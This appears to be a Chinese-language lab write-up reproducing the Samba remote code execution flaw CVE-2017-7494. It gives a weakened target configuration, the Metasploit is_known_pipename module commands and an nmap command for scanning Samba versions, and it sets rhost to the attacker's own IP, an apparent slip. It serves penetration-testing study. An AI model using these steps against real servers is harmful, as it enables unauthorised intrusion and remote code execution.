Samba远程代码执行漏洞复现(CVE-2017-7494)

Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。。

测试环境

用途 IP 备注
攻击机 192.168.0.109 kali2.0用于生成攻击
靶机 192.168.0.107 Samba4.5.9源码安装,关闭selinux、iptables

Samba安装示例

安装示例链接:
http://154883753.blog.51cto.com/470223/1740218/
本次测试靶机的smb.conf设置如下:
[public]
path = /home/samba
public = yes
writable = yes
browseable = yes
guest ok = yes
read list = nobody
write list = nobody
测试共享目录/home/samba权限设置为777

关闭selinux:setenforce 0
关闭iptables:service iptables stop
启动samba服务:/usr/local/samba/sbin/smbd

攻击测试

使用Metasploit公开的exploits模块(is_known_pipename)进行测试。下载地址:https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb

use exploit/linux/samba/is_known_pipename
Set rhost 192.168.0.109
Set target 2
攻击者暴力猜解共享目录的绝对路径
samba
也可以使用其他payload进行攻击测试

总结

虽然条件限制还是比较多,但是在渗透测试过程中还是存在一定的意义。

  1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问
  2. 共享文件拥有写入权限
  3. 恶意攻击者需猜解Samba服务端共享目录的物理路径

Tips

远程检测:使用nmap –script=smb-os-discovery -p 445 192.168.0.107/24命令扫描网络中Samba版本。